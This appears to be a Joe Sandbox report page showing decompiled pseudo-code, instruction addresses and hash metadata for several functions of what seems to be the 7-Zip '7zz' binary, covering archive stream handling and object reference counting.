									 *(_t322 - 0x18) = 0;
									_t266 =  *_t198;
									 *(_t322 - 4) = 4;
									_t200 =  *_t266(_t198, 0x47a638, _t322 - 0x18);
									_t201 =  *(_t322 - 0x18);
									if(_t200 != 0 || _t201 == 0) {
										 *(_t322 - 4) = 3;
										goto L46;
									} else {
										E004189B9(_t322 - 0x78);
										_push(_t322 - 0x74);
										_push(_t313);
										 *(_t322 - 4) = 5;
										_t205 = E004179F7(_t319);
										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
										if(_t205 != 0) {
											 *(_t322 - 4) = 4;
											E004039FA(_t322 - 0x78);
											_t207 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t207 != 0) {
												 *((intOrPtr*)( *_t207 + 8))(_t207);
											}
											_t208 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t208 != 0) {
												 *((intOrPtr*)( *_t208 + 8))(_t208);
											}
											_t209 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t209 != 0) {
												 *((intOrPtr*)( *_t209 + 8))(_t209);
											}
											_t184 =  *((intOrPtr*)(_t322 - 0x28));
											goto L77;
										}
										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
										 *(_t322 - 4) = 6;
										 *((intOrPtr*)( *_t213))(_t213, 0x47a5d8, _t322 - 0x1c);
										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
										if(_t215 != 0) {
											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
										}
										 *(_t322 - 0x58) = _t313;
										_t216 = E00417BAE(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
										if(_t216 == 1) {
											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t217 != 0) {
												 *((intOrPtr*)( *_t217 + 8))(_t217);
											}
											_t266 = _t322 - 0x78;
											 *(_t322 - 4) = 4;
											E004039FA(_t266);
											_t201 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											L46:
											if(_t201 != 0) {
												_t266 =  *_t201;
												 *((intOrPtr*)(_t266 + 8))(_t201);
											}
											_t198 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											L49:
											if(_t198 != 0) {
												_t266 =  *_t198;
												 *((intOrPtr*)(_t266 + 8))(_t198);
											}
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											_t195 =  *(_t322 - 0x10);
											L52:
											if(_t195 != 0) {
												_t266 =  *_t195;
												 *((intOrPtr*)(_t266 + 8))(_t195);
											}
											goto L76;
										} else {
											if(_t216 != 0) {
												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t220 != 0) {
													 *((intOrPtr*)( *_t220 + 8))(_t220);
												}
												 *(_t322 - 4) = 4;
												E004039FA(_t322 - 0x78);
												_t222 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t222 != 0) {
													 *((intOrPtr*)( *_t222 + 8))(_t222);
												}
												_t223 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t223 != 0) {
													 *((intOrPtr*)( *_t223 + 8))(_t223);
												}
												_t224 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t224 != 0) {
													 *((intOrPtr*)( *_t224 + 8))(_t224);
												}
												_t184 =  *((intOrPtr*)(_t322 - 0x28));
												goto L77;
											}
											_t320 = E00417B16(_t319, _t313, _t322 - 0x54, _t322 - 0x4c);
											if(_t320 != 0) {
												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t232 != 0) {
													 *((intOrPtr*)( *_t232 + 8))(_t232);
												}
												 *(_t322 - 4) = 4;
												E004039FA(_t322 - 0x78);
												_t234 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t234 != 0) {
													 *((intOrPtr*)( *_t234 + 8))(_t234);
												}
												_t235 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t235 != 0) {
													 *((intOrPtr*)( *_t235 + 8))(_t235);
												}
												_t236 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t236 != 0) {
													 *((intOrPtr*)( *_t236 + 8))(_t236);
												}
												goto L71;
											}
											_push(_t322 - 0x78);
											E00418F34( *((intOrPtr*)(_t322 - 0x20)));
											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t243 != 0) {
												 *((intOrPtr*)( *_t243 + 8))(_t243);
											}
											 *(_t322 - 4) = 4;
											E004039FA(_t322 - 0x78);
											_t245 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											while(1) {
												_t317 =  *((intOrPtr*)(_t322 + 0xc));
												_t307 = 1;
												_t313 = _t313 | 0xffffffff;
												_t181 =  *((intOrPtr*)(_t317 + 8));
												 *(_t322 - 0x24) = _t313;
												if(_t181 < _t307) {
													goto L6;
												}
												goto L4;
											}
										}
									}
								}
							}
						}
						E004189B9(_t322 - 0xb4);
						 *(_t322 - 4) = 0;
						E00401E26(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
						 *(_t322 - 0x94) = _t313;
						_t255 = E004183FD(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
						_t320 = _t255;
						if(_t320 != 0) {
							 *(_t322 - 4) = _t313;
							E004039FA(_t322 - 0xb4);
							goto L71;
						}
						_push(_t322 - 0xb4);
						E00418F34( *((intOrPtr*)(_t322 - 0x20)));
						 *(_t322 - 4) = _t313;
						E004039FA(_t322 - 0xb4);
						continue;
						L6:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= 0x20) {
							goto L76;
						}
						goto L7;
					}
				} else {
					_t184 = 0x80004001;
					L77:
					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
					return _t184;
				}
			}

0x00418559
0x00418566
0x00418567
0x0041856a
0x00418578
0x00418586
0x00418586
0x0041858b
0x0041858c
0x0041858f
0x00418592
0x00418597
0x00000000
0x00000000
0x00418599
0x0041859c
0x004185a1
0x0041899a
0x004189a3
0x004189a6
0x00000000
0x004189a6
0x004185b0
0x004185c4
0x004185c6
0x00418633
0x00418637
0x0041863e
0x00418642
0x0041864c
0x0041864f
0x00418654
0x00418814
0x00418814
0x0041881b
0x0041881d
0x0041896f
0x0041896f
0x00000000
0x0041896f
0x0041865f
0x0041898e
0x0041898e
0x00418992
0x00418995
0x00000000
0x00418995
0x00418665
0x00418667
0x00418671
0x00418676
0x00000000
0x00000000
0x0041867f
0x00000000
0x00000000
0x00418685
0x0041868c
0x00418691
0x00418694
0x0041869f
0x004186a2
0x004186a9
0x004186ad
0x004186b0
0x00418985
0x00000000
0x004186be
0x004186be
0x004186c1
0x004186c9
0x004186cd
0x004186d2
0x004186d5
0x0041897c
0x00000000
0x004186e3
0x004186e3
0x004186e6
0x004186f2
0x004186f6
0x004186fa
0x004186fd
0x00418973
0x00000000
0x0041870b
0x0041870e
0x00418718
0x00418719
0x0041871a
0x0041871e
0x00418725
0x00418728
0x0041882a
0x0041882e
0x00418833
0x00418836
0x0041883c
0x00418841
0x00418841
0x00418844
0x00418847
0x0041884d
0x00418852
0x00418852
0x00418855
0x00418858
0x0041885e
0x00418863
0x00418863
0x00418866
0x00000000
0x00418866
0x0041872e
0x00418731
0x00418740
0x00418744
0x00418746
0x0041874b
0x00418753
0x00418753
0x0041875c
0x00418769
0x00418771
0x00418774
0x0041886e
0x00418871
0x00418877
0x0041887c
0x0041887c
0x0041887f
0x00418882
0x00418886
0x0041888b
0x0041888e
0x00418892
0x00418894
0x00418896
0x00418899
0x00418899
0x0041889c
0x0041889f
0x004188a3
0x004188a5
0x004188a7
0x004188aa
0x004188aa
0x004188ad
0x004188b1
0x004188b4
0x004188b6
0x004188bc
0x004188bf
0x004188bf
0x00000000
0x0041877a
0x0041877c
0x004188c7
0x004188ca
0x004188d0
0x004188d5
0x004188d5
0x004188db
0x004188df
0x004188e4
0x004188e7
0x004188ed
0x004188f2
0x004188f2
0x004188f5
0x004188f8
0x004188fe
0x00418903
0x00418903
0x00418906
0x00418909
0x0041890f
0x00418914
0x00418914
0x00418917
0x00000000
0x00418917
0x00418792
0x00418796
0x0041891f
0x00418922
0x00418928
0x0041892d
0x0041892d
0x00418933
0x00418937
0x0041893c
0x0041893f
0x00418945
0x0041894a
0x0041894a
0x0041894d
0x00418950
0x00418956
0x0041895b
0x0041895b
0x0041895e
0x00418961
0x00418967
0x0041896c
0x0041896c
0x00000000
0x00418967
0x004187a2
0x004187a3
0x004187a8
0x004187ab
0x004187b1
0x004187b6
0x004187b6
0x004187bc
0x004187c0
0x004187c5
0x004187c8
0x004187ce
0x004187d3
0x004187d3
0x004187d6
0x004187d9
0x004187df
0x004187e4
0x004187e4
0x004187e7
0x004187ea
0x004187f0
0x004187f9
0x004187f9
0x00418586
0x00418586
0x0041858b
0x0041858c
0x0041858f
0x00418592
0x00418597
0x00000000
0x00000000
0x00000000
0x00418597
0x00418586
0x00418774
0x004186fd
0x004186d5
0x004186b0
0x004185ce
0x004185dc
0x004185df
0x004185ed
0x004185ff
0x00418604
0x00418608
0x00418807
0x0041880a
0x00000000
0x0041880a
0x00418617
0x00418618
0x00418623
0x00418626
0x00000000
0x004185b5
0x004185b8
0x004185be
0x00000000
0x00000000
0x00000000
0x004185be
0x0041857a
0x0041857a
0x004189a8
0x004189ae
0x004189b6
0x004189b6

APIs

__EH_prolog.LIBCMT ref: 00418559

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
Instruction ID: 76bd23d462c274ce260ddb573aa15372642f75ed32e5dbe225ef9e2e1f132d85
Opcode Fuzzy Hash: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
Instruction Fuzzy Hash: 3CE15D70900249DFCF10DFA4C884AEEBBB5EF49314F2445AEE559E7291CB389E85CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0042B338 Relevance: 1.6, APIs: 1, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0042B338() {
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t92;
				void* _t100;
				intOrPtr* _t101;
				void* _t125;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				void* _t134;
				void* _t136;

				E0046B890(E0047718C, _t134);
				_t101 =  *((intOrPtr*)(_t134 + 8));
				 *((intOrPtr*)(_t134 - 0x10)) = _t136 - 0x68;
				 *(_t134 - 4) = 0;
				 *((intOrPtr*)( *_t101 + 0x10))(_t101, _t125, _t129, _t100);
				E0040862D();
				_t130 =  *((intOrPtr*)(_t134 + 0x14));
				 *(_t134 - 4) = 1;
				 *((intOrPtr*)(_t134 - 0x18)) = _t130;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130 + 4))(_t130);
				}
				 *((intOrPtr*)(_t134 - 0x14)) = 0;
				_t140 = _t130;
				 *(_t134 - 4) = 3;
				if(_t130 != 0) {
					 *((intOrPtr*)( *_t130))(_t130, 0x47a578, _t134 - 0x14);
				}
				 *((intOrPtr*)(_t134 - 0x74)) = 0;
				 *(_t134 - 4) = 4;
				E00405B9F(_t134 - 0x70);
				 *((intOrPtr*)(_t134 - 0x70)) = 0x47b3b8;
				_push( *((intOrPtr*)(_t134 + 0x10)));
				 *(_t134 - 4) = 5;
				_t70 = E0042D57A(_t134 - 0x74, _t134, _t140,  *((intOrPtr*)(_t134 + 0xc)));
				_t141 = _t70;
				 *((intOrPtr*)(_t134 + 0x10)) = _t70;
				if(_t70 == 0) {
					 *(_t101 + 0x240) =  *(_t101 + 0x240) & 0x00000000;
					 *((intOrPtr*)(_t134 - 0x24)) = 0;
					 *((intOrPtr*)(_t134 - 0x20)) = 0;
					 *((intOrPtr*)(_t134 - 0x1c)) = 0;
					E00401E9A(_t134 - 0x24, 3);
					_push(_t101 + 0x240);
					_t127 = _t101 + 0x70;
					_push( *((intOrPtr*)(_t134 - 0x14)));
					 *(_t134 - 4) = 6;
					_push(_t101 + 0x70); // executed
					_t72 = E0042F024(_t134 - 0x74, __eflags); // executed
					_t132 = _t72;
					__eflags = _t132;
					if(__eflags == 0) {
						E0042EAEC(_t127);
						E0042EB2E();
						E0042EB83(_t127);
						E0040C9B4(_t101 + 0x6c,  *((intOrPtr*)(_t134 + 0xc)));
						E00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						E0042B501(_t134 - 0x74, __eflags);
						_t79 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t79;
						if(_t79 != 0) {
							 *((intOrPtr*)( *_t79 + 8))(_t79);
						}
						_t80 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t80;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						 *(_t134 - 4) =  *(_t134 - 4) & 0x00000000;
						E00430B45(_t101, __eflags);
						_t82 = 0;
					} else {
						E00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						E0042B501(_t134 - 0x74, __eflags);
						_t87 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t87;
						if(_t87 != 0) {
							 *((intOrPtr*)( *_t87 + 8))(_t87);
						}
						_t88 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t88;
						if(_t88 != 0) {
							 *((intOrPtr*)( *_t88 + 8))(_t88);
						}
						_t82 = _t132;
					}
				} else {
					 *(_t134 - 4) = 3;
					E0042B501(_t134 - 0x74, _t141);
					_t92 =  *((intOrPtr*)(_t134 - 0x14));
					 *(_t134 - 4) = 2;
					if(_t92 != 0) {
						 *((intOrPtr*)( *_t92 + 8))(_t92);
					}
					 *(_t134 - 4) = 1;
					if(_t130 != 0) {
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
					_t82 =  *((intOrPtr*)(_t134 + 0x10));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t134 - 0xc));
				return _t82;
			}

0x0042b33d
0x0042b346
0x0042b34d
0x0042b353
0x0042b356
0x0042b35f
0x0042b364
0x0042b367
0x0042b36d
0x0042b370
0x0042b375
0x0042b375
0x0042b378
0x0042b37b
0x0042b37d
0x0042b381
0x0042b38f
0x0042b38f
0x0042b391
0x0042b397
0x0042b39b
0x0042b3a0
0x0042b3a7
0x0042b3ad
0x0042b3b4
0x0042b3b9
0x0042b3bb
0x0042b3be
0x0042b3f3
0x0042b405
0x0042b408
0x0042b40b
0x0042b40e
0x0042b413
0x0042b414
0x0042b417
0x0042b41d
0x0042b421
0x0042b422
0x0042b427
0x0042b429
0x0042b42b
0x0042b46d
0x0042b474
0x0042b47b
0x0042b486
0x0042b48e
0x0042b494
0x0042b49b
0x0042b4a0
0x0042b4a3
0x0042b4a7
0x0042b4a9
0x0042b4ae
0x0042b4ae
0x0042b4b1
0x0042b4b4
0x0042b4b8
0x0042b4ba
0x0042b4bf
0x0042b4bf
0x0042b4c2
0x0042b4c8
0x0042b4cd
0x0042b42d
0x0042b430
0x0042b436
0x0042b43d
0x0042b442
0x0042b445
0x0042b449
0x0042b44b
0x0042b450
0x0042b450
0x0042b453
0x0042b456
0x0042b45a
0x0042b45c
0x0042b461
0x0042b461
0x0042b464
0x0042b464
0x0042b3c0
0x0042b3c3
0x0042b3c7
0x0042b3cc
0x0042b3cf
0x0042b3d5
0x0042b3da
0x0042b3da
0x0042b3df
0x0042b3e3
0x0042b3e8
0x0042b3e8
0x0042b3eb
0x0042b3eb
0x0042b4f5
0x0042b4fe

APIs

__EH_prolog.LIBCMT ref: 0042B33D

Part of subcall function 0042F024: __EH_prolog.LIBCMT ref: 0042F029

Part of subcall function 0042B501: __EH_prolog.LIBCMT ref: 0042B506

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
Instruction ID: 5cb2430fb4dc953f393a3ee5c8d9f9ed3e7e4da21bbd91b41222667785b49699
Opcode Fuzzy Hash: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
Instruction Fuzzy Hash: 8551A130A00258DFCF11EFA5D9846EEBBB4EF54308F24409EE805A7352CB789E41DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00412DB2 Relevance: 1.6, APIs: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412DB2(void* __ecx) {
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr* _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t101;
				intOrPtr _t103;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t118;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t123;

				E0046B890(E00474574, _t121);
				_push(__ecx);
				 *((intOrPtr*)(_t121 - 0x10)) = _t123;
				 *((intOrPtr*)(_t121 - 4)) = 0;
				if( *((intOrPtr*)(_t121 + 0xc)) < 0 ||  *((intOrPtr*)(_t121 + 0xc)) > 3) {
					_t70 =  *((intOrPtr*)(_t121 + 8));
					_t118 = _t70 + 0x98;
					_t71 =  *((intOrPtr*)(_t70 + 0x98));
					__eflags = _t71;
					if(_t71 != 0) {
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						 *_t118 = 0;
					}
					_t72 = 0x80004005;
					goto L36;
				} else {
					_t120 =  *((intOrPtr*)(_t121 + 8));
					if( *((intOrPtr*)(_t120 + 0xa0)) != 0) {
						_t87 =  *((intOrPtr*)(_t120 + 0x9c));
						 *((intOrPtr*)(_t120 + 0xf0)) =  *((intOrPtr*)(_t120 + 0xf0)) +  !( *(_t87 + 0x18));
						 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t87 + 0x10));
						 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t87 + 0x14));
						 *((char*)(_t120 + 0x90)) = 1;
						_t89 =  *((intOrPtr*)(_t120 + 0xa0));
						if(_t89 != 0) {
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							 *((intOrPtr*)(_t120 + 0xa0)) = 0;
						}
					}
					if( *((intOrPtr*)(_t120 + 0x98)) == 0) {
						L24:
						_t115 = _t120 + 0x90;
						if( *((intOrPtr*)(_t120 + 0x90)) != 0) {
							L26:
							 *((intOrPtr*)(_t120 + 0xe8)) =  *((intOrPtr*)(_t120 + 0xe8)) +  *((intOrPtr*)(_t120 + 0x88));
							asm("adc [eax+0x4], edx");
							L27:
							_t75 = _t120 + 0xd8;
							if( *((intOrPtr*)(_t120 + 0x80)) == 0) {
								_t75 = _t120 + 0xe0;
							}
							 *_t75 =  *_t75 + 1;
							asm("adc [eax+0x4], ebx");
							if( *((intOrPtr*)(_t120 + 0x59)) != 0 &&  *((intOrPtr*)(_t120 + 0x7f)) != 0) {
								E00409A29( *((intOrPtr*)(_t120 + 0x38)),  *((intOrPtr*)(_t120 + 0x78))); // executed
							}
							_t76 =  *((intOrPtr*)(_t120 + 0x18));
							_t72 =  *((intOrPtr*)( *_t76 + 0x20))(_t76,  *((intOrPtr*)(_t121 + 0xc)),  *((intOrPtr*)(_t120 + 0x5d)));
							L36:
							 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
							return _t72;
						}
						E00411FA9(_t120);
						if( *_t115 == 0) {
							goto L27;
						}
						goto L26;
					}
					if( *((intOrPtr*)(_t120 + 0x5c)) == 0 ||  *((intOrPtr*)(_t120 + 0x7e)) == 0) {
						_t79 =  *((intOrPtr*)(_t120 + 0x10));
						__eflags =  *((intOrPtr*)(_t79 + 0x2c));
						if(__eflags == 0) {
							 *((intOrPtr*)(_t121 + 8)) = 0;
							goto L13;
						}
						_t86 = _t79 + 0x24;
						goto L9;
					} else {
						_t86 = _t120 + 0x70;
						L9:
						 *((intOrPtr*)(_t121 + 8)) = _t86;
						L13:
						if( *((intOrPtr*)(_t120 + 0x5b)) == 0 ||  *((intOrPtr*)(_t120 + 0x7d)) == 0) {
							_t112 = 0;
							__eflags = 0;
						} else {
							_t112 = _t120 + 0x68;
						}
						if( *((intOrPtr*)(_t120 + 0x5a)) == 0) {
							L20:
							_t101 = 0;
							__eflags = 0;
							goto L21;
						} else {
							_t135 =  *((intOrPtr*)(_t120 + 0x7c));
							if( *((intOrPtr*)(_t120 + 0x7c)) == 0) {
								goto L20;
							}
							_t101 = _t120 + 0x60;
							L21:
							E0040BD82( *((intOrPtr*)(_t120 + 0x94)) + 8, _t101, _t112,  *((intOrPtr*)(_t121 + 8)));
							_t103 =  *((intOrPtr*)(_t120 + 0x94));
							 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t103 + 0x18));
							 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t103 + 0x1c));
							 *((char*)(_t120 + 0x90)) = 1;
							_t72 = E0040D3F3(_t103, _t135);
							if(_t72 != 0) {
								goto L36;
							}
							_t84 =  *((intOrPtr*)(_t120 + 0x98));
							if(_t84 != 0) {
								 *((intOrPtr*)( *_t84 + 8))(_t84);
								 *((intOrPtr*)(_t120 + 0x98)) = 0;
							}
							goto L24;
						}
					}
				}
			}

0x00412db7
0x00412dbc
0x00412dc5
0x00412dc8
0x00412dcb
0x00412f42
0x00412f45
0x00412f4b
0x00412f51
0x00412f53
0x00412f58
0x00412f5b
0x00412f5b
0x00412f5d
0x00000000
0x00412ddb
0x00412ddb
0x00412de4
0x00412de6
0x00412df1
0x00412dfd
0x00412e03
0x00412e09
0x00412e10
0x00412e18
0x00412e1d
0x00412e20
0x00412e20
0x00412e18
0x00412e2c
0x00412ecd
0x00412ed3
0x00412ed9
0x00412ee6
0x00412ef2
0x00412efe
0x00412f01
0x00412f07
0x00412f0d
0x00412f0f
0x00412f0f
0x00412f15
0x00412f18
0x00412f1e
0x00412f2b
0x00412f2b
0x00412f33
0x00412f3d
0x00412f62
0x00412f67
0x00412f70
0x00412f70
0x00412edd
0x00412ee4
0x00000000
0x00000000
0x00000000
0x00412ee4
0x00412e35
0x00412e44
0x00412e47
0x00412e4a
0x00412e51
0x00000000
0x00412e51
0x00412e4c
0x00000000
0x00412e3c
0x00412e3c
0x00412e3f
0x00412e3f
0x00412e54
0x00412e57
0x00412e63
0x00412e63
0x00412e5e
0x00412e5e
0x00412e5e
0x00412e68
0x00412e74
0x00412e74
0x00412e74
0x00000000
0x00412e6a
0x00412e6a
0x00412e6d
0x00000000
0x00000000
0x00412e6f
0x00412e76
0x00412e8a
0x00412e8f
0x00412e94
0x00412e9d
0x00412ea3
0x00412eaa
0x00412eb1
0x00000000
0x00000000
0x00412eb7
0x00412ebf
0x00412ec4
0x00412ec7
0x00412ec7
0x00000000
0x00412ebf
0x00412e68
0x00412e35

APIs

__EH_prolog.LIBCMT ref: 00412DB7

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
Instruction ID: 07fe3d3cc5dbb80cfcc1b2f20c161f072f6c6ff10f75d1b6cf221e6a487779e4
Opcode Fuzzy Hash: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
Instruction Fuzzy Hash: CC513775600B80DFD725CF24C590BA7BBE1BB45304F08886EE49ACB312D775A99ADB14

Uniqueness

Uniqueness Score: -1.00%

Function 0042A0B8 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042A0B8(void* __ecx) {
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr _t83;
				signed int _t97;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				void* _t104;

				E0046B890(E00476E40, _t104);
				_t100 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
					 *(_t104 - 0x10) = 2;
				} else {
					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
				}
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
				 *(_t104 - 4) = 0;
				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
				if(_t61 == 0) {
					E0040C9B4( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
					_t64 =  *((intOrPtr*)(_t100 + 0xc));
					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
					 *((intOrPtr*)(_t64 + 0x10)) = 0;
					 *((intOrPtr*)(_t64 + 0x14)) = 0;
